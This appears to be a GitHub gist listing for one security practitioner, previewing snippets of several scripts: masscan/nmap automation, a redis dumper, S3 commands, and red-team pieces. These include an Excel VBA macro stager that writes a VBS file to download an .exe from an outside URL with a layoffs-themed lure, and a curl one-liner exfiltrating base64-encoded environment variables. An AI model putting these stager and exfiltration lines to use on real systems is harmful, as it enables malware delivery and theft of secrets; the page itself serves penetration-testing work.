This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### | |
| # Author: Jason Ostrom | |
| ### | |
| # | |
| # Description: Connect to a redis server and print unique values for keys | |
| # | |
| ### | |
| # 1. Install python redis client | |
| # $sudo pip3 install redis | |
| # 2. Edit your HOST |
iknowjason
/ masscan_nmap4.py
Created
December 8, 2020 17:53
A python script that automates running masscan and nmap together. Just supply the first masscan command for hosts and ports
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Step 1: Edit your masscan command in the variable line below, correctly specifying your hosts and ports. You don't need to change the '-oJ mscan.xml' line as this is required. | |
| masscan_command = "sudo masscan 192.168.7.0/24 --rate 20000 -p1-3000 -oG mscan.xml" | |
| #Example masscan_command = "sudo masscan 192.168.7.0/24 --rate 20000 -p1-65535 -oG mscan.xml" | |
| #Example masscan_command = "sudo masscan 192.168.7.0/24 -p1-65535 -oG mscan.xml" | |
| ### Note: Make sure your output file name is 'mscan.txt' | |
| ### Step 2: Run this script | |
| ### python3 masscan_nmap4.py | |
| import os |
iknowjason
/ masscan_nmap3.py
Last active
July 11, 2023 09:57
A python script that automates running masscan and nmap together. Just supply the first masscan command for hosts and ports
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Step 1: Run masscan with a JSON output file | |
| ### Example: sudo masscan 192.168.10.0/24 --rate 10000 -p1-65535 -oJ mscan.xml | |
| ### Note: Make sure you take note of your output file for next step | |
| ### Important Note: Tested on masscan 1.06 - There might be issues with older versions of masscan (i.e., 1.04) with JSON output | |
| ## Step 2: Run this script that takes the output from Masscan JSON file and outputs a command you can use for nmap | |
| ### Example: python3 masscan_nmap3.py mscan.xml | |
| ### Note: The script will create 'scans.txt' to be used by nmap; This file will allow you to run one nmap command per line, with each host and the ports listening that were enumerated by masscan | |
| ## Step 3: Run the command below which will loop through 'scans.txt' and run an nmap scan. An output file will be created for each host: |
iknowjason
/ masscan_nmap2.py
Last active
August 15, 2024 11:00
Automates masscan and nmap by creating a list of hosts and normalized ports and running both masscan and nmap automatically
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Edit the file for any nmap specific options after masscan runs | |
| 2. Run it: masscan_nmap2.py -i <IP> -p <Ports> -r <RATE> |
iknowjason
/ masscan_nmap1.py
Last active
September 17, 2020 11:37
A more automated way to quickly run masscan to discover live hosts and ports and have nmap run scan against that output
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Overview: These steps will help you automate masscan and nmap together. Run masscan to enumerate all live hosts and listening ports. | |
| ### Then use nmap to run a more targeted service and NSE basic scripts scan. This will ran against all hosts with all enumerated ports. | |
| ### So there might be extra port scans that run against hosts that don't have those listening ports. | |
| ### Important Note: Tested on masscan 1.06 - There might be issues with older versions of masscan (i.e., 1.04) with JSON output | |
| ### Step 1: Run masscan with a JSON output file | |
| ### Example: sudo masscan 192.168.10.0/24 -p1-65535 -oJ mscan.xml | |
| ### Note: Make sure you take note of your output file for next step | |
| ## Step 2: Run this script that takes the output from Masscan JSON output file and outputs a command you can use for nmap |
iknowjason
/ payload1.vbs
Created
July 31, 2020 21:12
VBS code to write a stager inside of Excel Macro
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Sub CommandButton1_Click() | |
| Dim myoutputfile As Integer | |
| Dim FilePath As String | |
| Set oShell = CreateObject("WScript.Shell") | |
| userProfilePath = oShell.ExpandEnvironmentStrings("%UserProfile%") | |
| myFile = userProfilePath + "\layoffs15.vbs" | |
| myoutputfile = FreeFile | |
| Open myFile For Output As #myoutputfile | |
| Print #myoutputfile, "HTTPDownload ""http://billing.rtcfingroup.com/nysoft15.exe"", """ & userProfilePath & """"; "" |
iknowjason
/ curl-exfil.sh
Last active
August 20, 2020 13:56
Curl client exfil of environment variable that is Base64 encoded
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| STUFF=`env | base64`; curl -d "$STUFF" -X POST http://localhost:8000 |
iknowjason
/ post.py
Last active
July 5, 2023 02:35
Data exfiltration using curl and python SimpleHTTPServer class
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from http.server import HTTPServer, BaseHTTPRequestHandler | |
| class SimpleHTTPRequestHandler(BaseHTTPRequestHandler): | |
| def do_GET(self): | |
| self.send_response(200) | |
| self.end_headers() | |
| self.wfile.write(b'Hello, world!') | |
| def do_POST(self): | |
| content_length = int(self.headers['Content-Length']) |
iknowjason
/ getbucketencryption.sh
Last active
April 19, 2020 19:02
Get the server-side encryption configuration for an S3 bucket, or test for encryption with head-object command
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| aws s3api get-bucket-encryption --bucket <BUCKET> | |
| aws s3api head-object --bucket <BUCKET> --key <KEY> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| s3cmd get s3://<BUCKET>/<OBJECT> <LOCAL_FILE> |